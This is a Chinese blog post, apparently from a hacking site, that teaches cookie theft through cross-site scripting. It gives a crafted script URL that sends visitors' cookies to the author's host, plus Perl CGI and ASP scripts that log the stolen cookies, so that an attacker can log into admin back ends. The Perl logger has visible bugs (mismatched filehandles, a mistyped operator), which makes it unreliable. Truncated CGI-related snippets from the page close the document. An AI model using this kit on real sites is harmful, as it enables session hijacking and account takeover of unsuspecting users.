XSS,现在都成热门词了,跨来跨去都是alert,无聊~~ 其实alert()不能排除是一种检测方式,很实用,呵呵。跨站跨到Cookies才是正道,如果网站系统有Cookie欺骗漏洞的话那就非常妙了,直接跨到管理员的Cookie一下子就能登陆后台,拿到权限比较爽。
虚构测试URL:http://hi.baidu.com/biweilun/cgi-bin/Articles.cgi?ID=<script>alert('biweilun')</script>
如果这样能弹出一个框框的话,那么你就可以利用了。
经常看到别人在网上放出收取Cookie的PHP脚本,貌似CGI脚本的没什么写?今天biweilun放出来一个,方便用于国外的XSS漏洞使用:
构造evilURL为:
http://hi.baidu.com/biweilun/cgi-bin/Articles.cgi?ID=<script>document.location='http://www.biweilun.cn/cgi-bin/cookie_catch.cgi?'+document.cookie</script>
www.biweilun.cn为你自己的虚拟主机空间,cookie_catch脚本代码如下:
#!/usr/bin/perl
# cookie_catch.cgi
# http://hi.baidu.com/biweilun
#
$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info = ~s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;
open(COOKIE_handle, ">>cookielog") || die "Can't write in\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(COOKIE_handle);
ASP版的Cookie截取代码为Cookie.asp:
<%
testfile=Server.MapPath("cookie.txt")
msg=Request("m")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
将提交上来的m变量存在cookie.txt里,用get方式提交就行了。
然后我们在网页里嵌入
<script>document.location='http://www.xxx.com/cookie.asp?m='+document.cookie</script>,用户浏览该帖子不会有任何反应就把cookie提交到我们的asp空间了
分享到:
相关推荐
在Linux环境下,为了快速配置CGI(Common Gateway Interface)脚本,我们需要首先了解CGI的原理,它是一种标准,使得Web服务器能够与各种程序交互,处理动态内容。在这个过程中,我们将使用Nginx作为Web服务器,并...
本资源包含了一份关于CGI脚本的PDF文档和一个可能包含相关链接或资料的TXT文件。 CGI脚本的主要工作原理是,当用户通过Web浏览器发送请求到Web服务器时,服务器接收到请求后,会调用CGI程序,将请求数据传递给它。...
【CGI脚本简介】 CGI(Common Gateway Interface)是一种标准,允许Web服务器与外部应用程序交互,从而生成动态网页内容。它使得开发者能够使用各种编程语言,如C、C++、Perl等创建Web应用程序。CGI脚本通常运行在...
### Cgi-bin 30个漏洞及使用方法详解 #### 一、概述 在Web开发领域,特别是基于Perl语言的动态网页开发中,CGI(Common Gateway Interface)扮演着重要的角色。然而,随着互联网技术的发展,CGI也逐渐暴露出一系列...
CGI脚本是什么? CGI脚本 怎样工作的? 一个简单的例子 我能用CGI脚本吗? 你的服务器配置允许CGI脚本吗? 你能编程吗? 你应该用什么编程语言? 你的服务器设置正确吗? 如果你的服务器不是UNIX系统呢? 解剖...
### CGI脚本入侵快速上手及脚本使用方法 #### 一、理解Shell与CGI **Shell**在计算机科学中通常指的是一个用户与操作系统之间的交互界面,它能够读取用户的命令并根据这些命令执行相应的操作。对于黑客或安全研究...
攻击者首先通过访问该站点上的一个CGI脚本`cgiview.cgi?1.html`发现了问题。正常情况下,访问这样的URL通常不会返回任何有用的信息或导致异常行为。然而,在本例中,攻击者尝试将URL中的参数修改为`cgiview.cgi?%%%%...
### CGI基础网络脚本教程详解 #### CGI脚本概述 CGI(Common Gateway Interface)是一种标准接口,允许Web服务器执行外部程序(通常是脚本),并将这些程序的结果返回给客户端(如浏览器)。通过这种方式,CGI脚本...
坎昆cgi脚本控制kankun wifi智能插头安装脚本SSH 到您的设备,创建文件夹 cgi-bin mkdir /www/cgi-bin 使用 scp 将文件复制到 cgi-bin 文件夹控制开关: http:///cgi-bin/relay.cgi?on http:...
这个压缩包“计算机软件-编程源码-CGI脚本入门学习.zip”显然是一份用于初学者了解和学习CGI脚本编程的资料。 **CGI的原理** CGI为Web服务器提供了一个接口,当用户通过浏览器发送HTTP请求时,服务器接收到请求后会...
【CGI脚本教程】 CGI(Common Gateway Interface)脚本是用于Web服务器与客户端之间交互的一种编程方式,使得服务器能够处理动态内容。本教程详细介绍了CGI脚本的使用和概念,适合对Web服务器和脚本编程感兴趣的...
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
http://tomcat.apache.org/download-70.cgi http://tomcat.apache.org/download-70.cgi
**Nginx 支持 CGI (Common Gateway Interface)** CGI(Common Gateway Interface)是一种标准,允许Web服务器执行外部程序并返回结果给浏览器。在Nginx中支持CGI,可以使我们运行各种脚本语言(如Perl、Python、PHP...
此外,为了安全性和性能考虑,了解CGI程序的性能优化、输入验证和防止跨站脚本(XSS)、SQL注入等安全问题也非常重要。例如,使用`cgi_escape_string()`对用户输入进行转义,防止注入攻击。 总的来说,`cgilib`为...
CGI 脚本使您的浏览器与用户能交互,为了在数据库中寻找一个名词,提供您写入的评论,或者从一个表单中选择几个条目并且能得到一个明确的回答。 CGI 脚本是什么? CGI 脚本简单地讲是个运行在 Web 服务器上的程序,...
fcgiwrap, CGI脚本的简单FastCGI包装 fcgiwrap信息:主页:作者:贡献者CGI脚本的简单FastCGI包装http://nginx.localdomain.pl/wiki/FcgiWrapGrzegorz Nosek <root@localdom
**Qt 访问 CGI 的方法与 CGI 实例** 在 IT 领域,尤其是 Web 开发中,CGI(Common Gateway Interface,通用网关接口)是一种标准,它允许 Web 服务器执行外部应用程序并返回结果给客户端。Qt 是一个强大的 C++ 库,...
CGI(Common Gateway Interface,通用网关接口)是Web服务器与外部程序进行通信的一种标准协议,使得动态网页的生成成为可能。在Linux环境下,CGI技术被广泛应用于创建交互式的Web应用程序。本教程将深入探讨如何在...
CGI在Linux环境中的实现通常涉及到编写脚本,通常是用Perl、Python或C语言,这些脚本被配置为Web服务器(如Apache或Nginx)可以执行的程序。在Linux上,CGI脚本通常放在`/var/www/cgi-bin`目录下,并配置相应的权限...